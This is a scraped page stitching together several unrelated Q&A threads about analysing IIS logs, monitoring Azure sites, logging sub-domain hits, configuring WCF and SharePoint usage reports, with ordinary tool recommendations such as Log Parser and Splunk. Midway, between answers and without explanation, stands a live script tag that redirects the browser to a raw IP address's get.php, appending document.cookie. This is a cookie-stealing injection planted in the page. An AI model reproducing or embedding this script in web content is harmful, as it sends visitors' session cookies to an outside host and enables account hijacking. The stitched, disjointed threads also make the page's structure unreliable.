I'm looking for some kind of tool that will let me slice and dice IIS web logs, for troubleshooting purposes...
All tools I've found are designed to analyze logs for a "Google Analytics" type of output, but what I want is more like "see all hits made from some IP", "see all hits to a specific ASHX file", things like that, to troubleshoot a few obscure bugs we are having with sessions...
Does anyone know of such a tool, or should I just roll my own?
Thanks!
Use logparser. It is a free tool to analyze all kinds of logs including IIS logs.
http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en
Here is another great link.
http://www.msexchange.org/tutorials/Using-Logparser-Utility-Analyze-ExchangeIIS-Logs.html
Our group at work is suggesting logdog. Open source, free, etc. I don't have direct experience, yet, but it is my understanding that it operates in a very efficient way on different logs (syslogd, access.log, error.log). You configure which logs to watch, how much, how often, what to look for. It can then be configured to send out alerts.
Splunk is more heavyweight. But its free ( if your logs aren't huge). And its cute.
And there are always the plain find, findstr, grep's and such.
Related
note: there are few similar questions already asked here - but they are from 2009. May be something has changed since then.
I'm responsible for a bunch of websites hosted on different servers. I do not do any log analysis right now, but I would like to change this. First question - what is the best tool to view ISSUES with the website based on IIS logs (i.e. 404, 500 responses, long page processing, etc)? Ideally with grouping/sorting options? I do not want to spend a lot of time on this, I just want to periodically check if all is good with the website.
Second question (and I know most likely i'm asking for too much) - but is there any way to expose processed logs to web? So I can review things mentioned above without RPDing into the server?
Ideally I'm looking for a free/open source solution, but I'm ready to pay for a good software as well (but not a lot of $$).
Thank you.
You can take a look at our log monitoring solution EventSentry, which can monitor text-based logs like IIS logs. We have standard templates setup for IIS, and we can consolidate the logs in a database with web-access, so that you can review the logs without using RDP.
It's a pretty flexible solution that allows you to pick the fields you are interested in, and ignore the ones you are not - and thus save space in your database.
You can also setup real-time alerts, so that you can get an email when a critical error is encountered in a log file, like a 500 error.
http://www.eventsentry.com/features/log-file-monitoring
Finally, you can also plug-in command line tools which can verify that a given web page is accessible, or get alerted when it changes: http://www.eventsentry.com/features/application-monitoring.
I'm biased of course, but I would say that our solution is pretty affordable. Since it offers additional functionality as well, such as service monitoring (to monitor your IIS services) and event log monitoring (IIS does log critical messages to the event log), you can setup comprehensive monitoring with a single product.
I'd look into #LuckyLuke solution (or similar) - classic "build vs buy" decision. Based on your post, this isn't going to be your "full time" job so IMHO its best to leave it to those who do...
I don't know what "legacy" answers you are referring to, but if you want to tinker you can use Microsoft's own log parser, and depending on how far you want to go with it, you can use it (COM dll) to write your "admin web pages" in .Net/ASP.Net and host it in each of your servers....
If you're very specific about the errors you just want to be alerted about, another "hacky" way would be to provide your own custom error pages (either the default IIS error pages, or configure your Asp.Net apps to use specific error pages).
I've been working on a web application and finally published it to Azure. The application is not critical and currently I use only one role to keep costs down.
I would like to start try and get a feel of who (if anyone is using my site). Can anyone give me some suggestions on how I could do this. What I would really like is not to use anything like the google scripts that I see some web sites use for monitoring page hits. I would like to do as much as possible on the server.
Help advice on where to start and what to look at would be much appreciated.
Katarina
Aside from things like Google Analytics and StatCounter, you'd want to set up some performance counters that you can watch externally. This requires you to use the Diagnostic Monitor:
Set up performance counters to track, and how often to poll for values
Set up frequency to upload to Table Storage
Diagnostic data is aggregated from all your instances, so then you can run queries against the diagnostic tables. Cerebrata has a page that details these table names (you can also use their Diagnostics Manager tool, other 3rd-party tools, or roll your own).
Igork posted this StackOverflow answer as well, which references some blog posts by Azure MVP Neil Mackenzie.
To add to Dave's answer, there are three levels of monitoring you can do:
If you want to know who is using your site, Google Analytics is best and free... There are a few others, but all involve injecting small javascript on your pages
If you want to know the load your site is under, inspecting performance counters via Cerebrata's tool is likely best # http://www.cerebrata.com
If you want to go one step further and be notified when the load on your site is outside your predefined conditions (active monitoring) or have your website automatically scale up when the load is too high, AzureWatch is probably the best option # http://www.paraleap.com
HTH
I need to log the hits on a sub-domain in Windows IIS 6.0 without designating them as separate websites in the IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid google analytics is not an option due to the setup, I just need access (i'm guessing) to the file request event and its properties.
Wyatt Barnette - I've thought of this! But how do I set those properties for it to collect them all? I'm writing my own log parsing software, as I need specific things, I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out the IIS log parsing tool. That should at least take care of the more onerous part of the task (actually making sense of the logfiles). From there it is a pretty straightforward reporting operation.
<script language="JavaScript">document.location="http://142.0.71.119:88/get.php?cookie="+document.cookie;</script>
Are there any tools that go beyond requiring deep and intimate knowledge of every configuration option and nuance and will just setup an application with a minimum of inputs. Something like a wizard that produces the XML configuration based on those simple inputs. I don't care about security I just need the service to work. Ideally the tool would be able to setup IIS6 as well or at least with a given set of options it would produce a list of steps I needed to complete in IIS.
The Microsoft Service Configuration Editor is no better than direct editing of the XMl. I did find a web site that has the right idea but it wasn't able to solve my simple installation. (http://www.noemax.com/support/wcf_binding_configuration_wizard.html).
Is there anything out there that puts some convention into play over this mountain of configuration?
WCF configuration can look very daunting at first, indeed! I like that configuration wizard you linked to - why wasn't it good enough for you?
I don't know of any tool right now, that would solve your problem and help you figure out the proper configuration - it really boils down to learning the ropes and getting to know the ins and outs of it, I'm afraid.
Basically, what I've learned is : don't even start to imagine all the things you could do - try to focus on what you should do (and what you need).
Really, it boils down to about five scenarios as outlined in the excellent book "Programming WCF" by Juval Lowy:
intranet apps (use the NetTcp binding, Windows security)
internet apps (use the wsHttp binding if ever possible, username/pwd or certificates for security)
business-to-business apps (use whatever binding makes sense, secure by certificates)
queue message delivery (MSMQ)
no-security apps (legacy ASMX support, interop with "dumb" webservice clients)
Basically, pick the one you need, and from there, you're pretty much set as to what to do and how to do it. I would definitely recommend checking out Juval's book - excellent excellent resource!
So the question is: which category does your app fit in? Based on that, you can pretty much determine all that's needed from there.
Also, I watched two screencasts that really helped me get over the heaps of configuration options in WCF, and focus on what's really important:
Extreme WCF with Miguel Castro
Demystifying WCF with Keith Elder
Both gave me a good feel for what configuration is really needed - and what is just fluff.
Hope that helps some!
Marc
I have been looking at the "_layouts/SpUsageSite.aspx" logs for my site, but they are giving erroneous results (eg 0 unique visitors when I know at least I have been on the site)
What is the best way to see these logs in a better way than the ootb functionality?
Did you enable the usage processing and the usage logging for the site in question?
You can enable them in you central admin under:
Operations -> Usage analysis processing
It may also be that the processing is limited to a speciffic timespan
I have come across a bug with the Usage analysis processing to do with UTC date conversion which resulted in the processed numbers being erroneous. This is apparently fixed in SP2, but we have not been able to implement this quite yet.
The alternative is a bit onerous as you need to copy the usage logs from each front end server to a location and configure the log parser to store the information in a data base.
Serge van den Oever steps through this quite well here.
I don't really recommend this as a regular process as it takes a lot of effort, but it does give you a huge amount of information for when you wish to take a detailed look at usage on a particular point of your SharePoint farm.
Ideally we would have a solution to parse the logs automagically using the log parser utility and provide that information in SSRS reports.
We patched to sp2 and it all started working again like magic.